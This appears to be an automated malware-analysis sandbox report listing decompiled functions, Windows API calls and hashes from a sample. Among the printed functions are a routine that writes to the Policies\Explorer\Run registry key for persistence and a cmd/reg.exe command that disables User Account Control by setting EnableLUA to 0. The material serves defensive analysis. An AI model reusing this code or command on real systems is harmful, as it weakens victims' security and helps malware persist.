                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040B7B9, Relevance: 10.5, APIs: 7, Instructions: 42registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 28%
                                                                                			E0040B7B9(void* _a4, void* _a8, short* _a12, void* _a16, int _a32) {
				long _t15;
				long _t18;
				void* _t21;
				int _t22;
				void* _t28;

				_t15 = RegCreateKeyW(_a4, _a8,  &_a8);
				if(_t15 != 0) {
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return 0;
				} else {
					__imp__?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ(_t28, _t21);
					_t17 = _t15 + _t15 + 2;
					__imp__?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ();
					_t22 = 0;
					_t18 = RegSetValueExW(_a8, _a12, 0, _a32, _t15 + _t15 + 2, _t17);
					RegCloseKey(_a8);
					if(_t18 == 0) {
						_t22 = 1;
					}
					__imp__??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ();
					return _t22;
				}
			}








                                                                                0x0040b7c6
                                                                                0x0040b7ce
                                                                                0x0040b81f
                                                                                0x0040b828
                                                                                0x0040b7d0
                                                                                0x0040b7d5
                                                                                0x0040b7db
                                                                                0x0040b7e3
                                                                                0x0040b7ea
                                                                                0x0040b7f6
                                                                                0x0040b801
                                                                                0x0040b809
                                                                                0x0040b80b
                                                                                0x0040b80b
                                                                                0x0040b810
                                                                                0x0040b81b
                                                                                0x0040b81b

                                                                                APIs
                                                                                • RegCreateKeyW.ADVAPI32(?,80000002,80000002), ref: 0040B7C6
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00415628,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7D5
                                                                                • ?c_str@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(?,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B7E3
                                                                                • RegSetValueExW.ADVAPI32(80000002,00407E26,00000000,?,00000000,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24), ref: 0040B7F6
                                                                                • RegCloseKey.ADVAPI32(80000002,?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28), ref: 0040B801
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 0040B810
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,00407E26,80000002,Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\Run\,00415A24,?,?,?,?,?,00415628,00000001,0041BA5C,0041BA28,00415A24), ref: 0040B81F
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: G@2@@std@@G@std@@U?$char_traits@V?$allocator@$??1?$basic_string@$?c_str@?$basic_string@?length@?$basic_string@CloseCreateValue
                                                                                • String ID:
                                                                                • API String ID: 1037601705-0
                                                                                • Opcode ID: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                                                                • Instruction ID: 16de392092bcd2de4e66c717f3c3c884efc51066479430e04c8b01777f2a524b
                                                                                • Opcode Fuzzy Hash: e47ed06fcfe4702c07f1ce527c0755a331d7201bc4fedc9c1fec415c236eba45
                                                                                • Instruction Fuzzy Hash: 4501A87204050DEFCF00AFA0EC998EA7B6DFB583597458035FD1996161D7329E14DBA4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040A0E1, Relevance: 10.5, APIs: 3, Strings: 3, Instructions: 39processCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 50%
                                                                                			E0040A0E1() {
				struct _PROCESS_INFORMATION _v20;
				struct _STARTUPINFOA _v88;
				signed int _t17;

				_t17 = 0x11;
				memset( &_v88, 0, _t17 << 2);
				_v88.cb = 0x44;
				asm("stosd");
				asm("stosd");
				asm("stosd");
				asm("stosd");
				CreateProcessA("C:\\Windows\\System32\\cmd.exe", "/k %windir%\\System32\\reg.exe ADD HKLM\\SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System /v EnableLUA /t REG_DWORD /d 0 /f", 0, 0, 0, 0x8000000, 0, 0,  &_v88,  &_v20);
				CloseHandle(_v20);
				return CloseHandle(_v20.hThread);
			}






                                                                                0x0040a0ed
                                                                                0x0040a0f1
                                                                                0x0040a0f6
                                                                                0x0040a0fd
                                                                                0x0040a0fe
                                                                                0x0040a0ff
                                                                                0x0040a100
                                                                                0x0040a11f
                                                                                0x0040a12e
                                                                                0x0040a138

                                                                                APIs
                                                                                • CreateProcessA.KERNEL32(C:\Windows\System32\cmd.exe,/k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f,00000000,00000000,00000000,08000000,00000000,00000000,00000044,?,0041BA38,0041BCB0), ref: 0040A11F
                                                                                • CloseHandle.KERNEL32(?), ref: 0040A12E
                                                                                • CloseHandle.KERNEL32(?), ref: 0040A133
                                                                                Strings
                                                                                • /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f, xrefs: 0040A115
                                                                                • D, xrefs: 0040A0F6
                                                                                • C:\Windows\System32\cmd.exe, xrefs: 0040A11A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandle$CreateProcess
                                                                                • String ID: /k %windir%\System32\reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f$C:\Windows\System32\cmd.exe$D
                                                                                • API String ID: 2922976086-1747066916
                                                                                • Opcode ID: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                                                                • Instruction ID: 0928101be9c5a4b5cd6cbd2924aec545eff454ae04b53be068f3b7a54285d6aa
                                                                                • Opcode Fuzzy Hash: 34e80a7266f22886247dd1c59806a28bf3f5ead1ecfd7117f941ad378ce73be4
                                                                                • Instruction Fuzzy Hash: 5EF054B2A00518BEFB019BE8DC05EFFBB7DE784700F114436FA11F6060D6746D088AA5
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004127F5, Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?length@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,0040464E,?,?,00000055), ref: 00412804
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@IDABV?$allocator@D@1@@Z.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041280E
                                                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEPADXZ.MSVCP60(?,0040464E,?,?,00000055), ref: 00412817
                                                                                • ?end@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 00412821
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QBEPBGXZ.MSVCP60(00000000,?,0040464E,?,?,00000055), ref: 0041282B
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,?,?,00000055), ref: 00412841
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,?,?,00000055), ref: 0041284A
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$D@2@@std@@D@std@@$G@2@@std@@G@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@D@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 2478582372-0
                                                                                • Opcode ID: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                                                                • Instruction ID: 9f96166dac4781290f3bd34c47d79f1531a5159583b3a655759a1da2a24b60ea
                                                                                • Opcode Fuzzy Hash: f35f0c3dd271747c8617ee2a79da0f1b075a0c74f27328e3a593d3adc6a0a34e
                                                                                • Instruction Fuzzy Hash: 50F0F97590060EEBCF04EFA0DD5D9EE7B78AF84349B008024F90697290DA70AA09CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412795, Relevance: 10.5, APIs: 7, Instructions: 31COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60(00000020,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127A4
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@IGABV?$allocator@G@1@@Z.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127AE
                                                                                • ?begin@?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAEPAGXZ.MSVCP60(?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127B7
                                                                                • ?end@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127C1
                                                                                • ?begin@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(00000000,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127CB
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@ABV01@@Z.MSVCP60(?,?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?), ref: 004127E1
                                                                                • ??1?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@XZ.MSVCP60(?,?,?,?,?,004135AE,?,?,?,?,?,?,?,0040969A,?,?), ref: 004127EA
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$U?$char_traits@$G@2@@std@@G@std@@$D@2@@std@@D@std@@$??0?$basic_string@?begin@?$basic_string@$??1?$basic_string@?end@?$basic_string@?length@?$basic_string@G@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 914748455-0
                                                                                • Opcode ID: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                                                                • Instruction ID: f669f26280469c21e485b93068b71aa9fa6b13bd9f3a6efc1e343f131735dcea
                                                                                • Opcode Fuzzy Hash: 071d9129cc4c15a7588e784708c8bfb61fe96f0cebcdac03ffdaa68953a5de9b
                                                                                • Instruction Fuzzy Hash: 08F0A97690450EEBCB04EFA0ED5DDEE7B78EB84305B048065F906972A0DA74AA09CF65
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00413BC8, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53registryCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 71%
                                                                                			E00413BC8() {
				char _v20;
				struct _WNDCLASSEXA _v68;
				struct HWND__* _t21;
				signed int _t23;

				_t23 = 0xb;
				memset( &(_v68.style), 0, _t23 << 2);
				asm("movsd");
				asm("movsd");
				asm("movsd");
				asm("movsw");
				_v68.cbSize = 0x30;
				asm("movsb");
				_v68.lpszClassName =  &_v20;
				_v68.style = 0;
				_v68.lpfnWndProc = E00413C3F;
				_v68.cbClsExtra = 0;
				_v68.cbWndExtra = 0;
				_v68.lpszMenuName = 0;
				if(RegisterClassExA( &_v68) == 0) {
					L3:
					return 0;
				}
				_t21 = CreateWindowExA(0,  &_v20, 0, 0, 0, 0, 0, 0, 0xfffffffd, 0, 0, 0);
				if(_t21 == 0) {
					GetLastError();
					goto L3;
				}
				return _t21;
			}







                                                                                0x00413bd4
                                                                                0x00413bd8
                                                                                0x00413be2
                                                                                0x00413be3
                                                                                0x00413be4
                                                                                0x00413be5
                                                                                0x00413bea
                                                                                0x00413bf1
                                                                                0x00413bf2
                                                                                0x00413bfb
                                                                                0x00413bfe
                                                                                0x00413c05
                                                                                0x00413c08
                                                                                0x00413c0b
                                                                                0x00413c17
                                                                                0x00413c39
                                                                                0x00000000
                                                                                0x00413c39
                                                                                0x00413c29
                                                                                0x00413c31
                                                                                0x00413c33
                                                                                0x00000000
                                                                                0x00413c33
                                                                                0x00413c3e

                                                                                APIs
                                                                                • RegisterClassExA.USER32(00000030), ref: 00413C0E
                                                                                • CreateWindowExA.USER32 ref: 00413C29
                                                                                • GetLastError.KERNEL32(?,00000000), ref: 00413C33
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: ClassCreateErrorLastRegisterWindow
                                                                                • String ID: 0$MsgWindowClass
                                                                                • API String ID: 2877667751-2410386613
                                                                                • Opcode ID: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                                                                • Instruction ID: 7311bfe71f6f07f925a5bea5fd399074fa81e1952be4f1bddfc29815928cdf0b
                                                                                • Opcode Fuzzy Hash: c722dd2e6d169ed387903e3056205791a775bb0513f46e273fb6c6412d1be798
                                                                                • Instruction Fuzzy Hash: D5019A72C00228AACB21CF91EC08ADFBFB9EF45761B004026F410B6240D7B05606CAE4
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004032B3, Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 24COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                  • Part of subcall function 0040B522: RegOpenKeyExA.KERNELBASE(?,80000002,00000000,00020119,80000002,00000000), ref: 0040B551
                                                                                  • Part of subcall function 0040B522: RegQueryValueExA.KERNELBASE(80000002,004140D8,00000000,00000000,?,00000400), ref: 0040B56E
                                                                                  • Part of subcall function 0040B522: RegCloseKey.ADVAPI32(80000002), ref: 0040B577
                                                                                  • Part of subcall function 0040B522: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(00415664,?), ref: 0040B596
                                                                                • ?c_str@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEPBDXZ.MSVCP60(?,?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032DA
                                                                                • atoi.MSVCRT ref: 004032E1
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(?,?,?,0041BCB0,0040310B,0041BA38,0041BCB0,00000000), ref: 004032ED
                                                                                Strings
                                                                                • SOFTWARE\Microsoft\Windows NT\CurrentVersion, xrefs: 004032C1
                                                                                • CurrentBuildNumber, xrefs: 004032BC
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@??1?$basic_string@?c_str@?$basic_string@CloseD@1@@OpenQueryValueatoi
                                                                                • String ID: CurrentBuildNumber$SOFTWARE\Microsoft\Windows NT\CurrentVersion
                                                                                • API String ID: 1453687294-3377751560
                                                                                • Opcode ID: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                                                                • Instruction ID: fd2564c0d0cdcb3147c4efd585e8939db476c869aa5c4bae27b80d41888a3fe0
                                                                                • Opcode Fuzzy Hash: 11ba8fd773ccb4f0d3c70d753f9be5e0adae2c01f6dbf8595f5c6f89531c0230
                                                                                • Instruction Fuzzy Hash: FFE04F72A00618E7C700B7A8DC0AFEEB768EB44755F504479B922A21D2EA749518C69C
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004126EF, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 18threadCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 100%
                                                                                			E004126EF(char _a4) {
				void* _t2;
				void* _t3;

				_t1 =  &_a4; // 0x40e322
				_t2 = GetCurrentProcess();
				_t3 = GetCurrentThread();
				return DuplicateHandle(GetCurrentProcess(), _t3, _t2,  *_t1, 0, 1, 2);
			}





                                                                                0x004126ff
                                                                                0x00412702
                                                                                0x00412705
                                                                                0x00412717

                                                                                APIs
                                                                                • GetCurrentProcess.KERNEL32("@,00000000,00000001,00000002,0041B310,?,0040E322,?), ref: 00412702
                                                                                • GetCurrentThread.KERNEL32 ref: 00412705
                                                                                • GetCurrentProcess.KERNEL32(00000000,?,0040E322,?), ref: 0041270C
                                                                                • DuplicateHandle.KERNEL32(00000000,?,0040E322,?), ref: 0041270F
                                                                                Strings
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: Current$Process$DuplicateHandleThread
                                                                                • String ID: "@
                                                                                • API String ID: 3566409357-445313631
                                                                                • Opcode ID: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                                                                • Instruction ID: 81c68930a35107f79e7ff7c0b5ef314a0f7766eb9aca927b546ed436d96719c8
                                                                                • Opcode Fuzzy Hash: cb8128faa2ef6cb65fcd5fe63ceb2ad590a4a68b38e9fedc2e9405bf734d92d8
                                                                                • Instruction Fuzzy Hash: FFD09E71D40718B7D91127E5AC0DFCA3F1CDB49771F108421F60896090CAA594408A94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 0040DB3C, Relevance: 7.6, APIs: 5, Instructions: 50COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@ABV01@@Z.MSVCP60(00000000,00000000), ref: 0040DB4D
                                                                                  • Part of subcall function 00402038: #23.WS2_32(00000000,00000001,00000006,0041BCB0,0040C8BF), ref: 00402053
                                                                                  • Part of subcall function 0040209B: #4.WS2_32(0041BE70,0041BE74,00000010,?,0041B320,?,0040CA5C), ref: 004020B1
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB87
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(0041B290), ref: 0040DB9B
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60(00000000), ref: 0040E6AC
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 0040E6B5
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@2@@std@@D@std@@U?$char_traits@V?$allocator@$V01@@$??0?$basic_string@??1?$basic_string@$??4?$basic_string@V01@
                                                                                • String ID:
                                                                                • API String ID: 250200872-0
                                                                                • Opcode ID: 9e51f500d0127f4068dc5164bc671e9d3acc2eedac6701e81ae34b3092b06bc0
                                                                                • Instruction ID: e4a4367fee434e29a8f43c0c5b5fd0ad89fe5f7d667a2954b88e43abb6528f81
                                                                                • Opcode Fuzzy Hash: 9e51f500d0127f4068dc5164bc671e9d3acc2eedac6701e81ae34b3092b06bc0
                                                                                • Instruction Fuzzy Hash: E301CC3260020C8BC300BBF5AC5A5EF3722DB85354B5084BBEA126B1D1CBBC0888869E
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00405C62, Relevance: 7.5, APIs: 5, Instructions: 42synchronizationCOMMON
                                                                                Download Yara Rule
                                                                                C-Code - Quality: 37%
                                                                                			E00405C62(void* __ecx) {
				long _t7;
				void* _t10;
				void* _t18;
				void* _t19;

				_t18 = __ecx;
				_t7 = CreateEventA(0, 0, 0, 0);
				 *(_t18 + 0x34) = _t7;
				if( *((char*)(_t18 + 0x3d)) != 0) {
					_t10 = _t18 + 0x14;
					do {
						__imp__??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z(_t10, 0x415664);
						if(_t7 != 0) {
							_t19 = _t19 - 0x10;
							__imp__??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z();
							E004020C2(0x41be70, 0x5a, _t10);
							__imp__??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z(0x415664);
						}
						_t7 = WaitForSingleObject( *(_t18 + 0x34), 0xffffffff);
					} while ( *((char*)(_t18 + 0x3d)) != 0);
				}
				return 1;
			}







                                                                                0x00405c6a
                                                                                0x00405c6d
                                                                                0x00405c77
                                                                                0x00405c7a
                                                                                0x00405c7c
                                                                                0x00405c84
                                                                                0x00405c86
                                                                                0x00405c90
                                                                                0x00405c92
                                                                                0x00405c98
                                                                                0x00405ca5
                                                                                0x00405cad
                                                                                0x00405cad
                                                                                0x00405cb8
                                                                                0x00405cbe
                                                                                0x00405c84
                                                                                0x00405cc9

                                                                                APIs
                                                                                • CreateEventA.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,004052B3), ref: 00405C6D
                                                                                • ??9std@@YA_NABV?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@0@PBD@Z.MSVCP60(?,00415664), ref: 00405C86
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 00405C98
                                                                                  • Part of subcall function 004020C2: ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?,0041BE70,?,0040CF62,0000004B), ref: 004020D1
                                                                                  • Part of subcall function 004020C2: ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004020E7
                                                                                • ??4?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAAV01@PBD@Z.MSVCP60(00415664,0000005A), ref: 00405CAD
                                                                                • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00405CB8
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: D@std@@U?$char_traits@V?$allocator@$D@2@@std@@$??0?$basic_string@V01@@$??1?$basic_string@??4?$basic_string@??9std@@CreateD@2@@0@EventObjectSingleV01@V?$basic_string@Wait
                                                                                • String ID:
                                                                                • API String ID: 2456067102-0
                                                                                • Opcode ID: 45bae59f47134ab90163eaec70089cb8538b3c20a9b70c8c16acf7688f10fafe
                                                                                • Instruction ID: 941b29cc010242a65ed123258a0f7c68229dc58979b588812575d9674897e9d1
                                                                                • Opcode Fuzzy Hash: 45bae59f47134ab90163eaec70089cb8538b3c20a9b70c8c16acf7688f10fafe
                                                                                • Instruction Fuzzy Hash: 3BF0C875500B00BFE71017249D88AE73BADEB81321B44993EF45296AD1CB755C448F74
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412981, Relevance: 7.5, APIs: 5, Instructions: 41COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@PBDABV?$allocator@D@1@@Z.MSVCP60(?,?), ref: 00412996
                                                                                • ?length@?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QBEIXZ.MSVCP60 ref: 004129A8
                                                                                • ??A?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAEAADI@Z.MSVCP60(00000000), ref: 004129B4
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV01@@Z.MSVCP60(?), ref: 004129D5
                                                                                • ??1?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@XZ.MSVCP60 ref: 004129DE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000001.641497403.0000000000400000.00000040.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000001.641564772.000000000041D000.00000040.00020000.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: V?$allocator@$D@2@@std@@D@std@@U?$char_traits@$??0?$basic_string@$??1?$basic_string@?length@?$basic_string@A?$basic_string@D@1@@V01@@
                                                                                • String ID:
                                                                                • API String ID: 1435062097-0
                                                                                • Opcode ID: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                                                                • Instruction ID: ff140a25c5046e2b9097d957d6cdce37f73a2c16b69e3829c68fb2596ec2fa1c
                                                                                • Opcode Fuzzy Hash: 3586215307afae4bda0d878f3d3768df6641f2eee590fdd5caa0a9f3ee196b0c
                                                                                • Instruction Fuzzy Hash: 5101847650025EEFCB009F68DC889EE7BBCFF89310F008455EC5697291D7749645CB94
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 00412B4A, Relevance: 7.5, APIs: 5, Instructions: 38COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • OpenProcess.KERNEL32(00000410,00000000,00409B39,6D1BCB60), ref: 00412B5E
                                                                                • GetModuleFileNameExW.PSAPI(00000000,00000000,?,00000208), ref: 00412B7E
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412B89
                                                                                • CloseHandle.KERNEL32(00000000), ref: 00412B9A
                                                                                • ??0?$basic_string@GU?$char_traits@G@std@@V?$allocator@G@2@@std@@QAE@PBGABV?$allocator@G@1@@Z.MSVCP60(?,?), ref: 00412BAE
                                                                                Memory Dump Source
                                                                                • Source File: 00000001.00000002.903195414.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                • Associated: 00000001.00000002.903223606.000000000041D000.00000040.00000001.sdmp Download File
                                                                                Yara matches
                                                                                Similarity
                                                                                • API ID: CloseHandleV?$allocator@$??0?$basic_string@FileG@1@@G@2@@std@@G@std@@ModuleNameOpenProcessU?$char_traits@
                                                                                • String ID:
                                                                                • API String ID: 788797586-0
                                                                                • Opcode ID: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                                                                • Instruction ID: ad3219438425194a21685df614a361962293db7adaf2229f34b8827cc35eabff
                                                                                • Opcode Fuzzy Hash: 022d2fd6006c4be54da2a4328dbb8e4cfe22859691548aaa1e3c37b3e0e1552c
                                                                                • Instruction Fuzzy Hash: 40F0A435644519FBDB119F50DD48FDA376CEB04701F008162F90ADA151DBB0FA418B99
                                                                                Uniqueness

                                                                                Uniqueness Score: -1.00%

                                                                                Function 004050FC, Relevance: 7.5, APIs: 5, Instructions: 34COMMON
                                                                                Download Yara Rule
                                                                                APIs
                                                                                • ??0?$basic_string@DU?$char_traits@D@std@@V?$allocator@D@2@@std@@QAE@ABV?$allocator@D@1@@Z.MSVCP60(?), ref: 0040510A
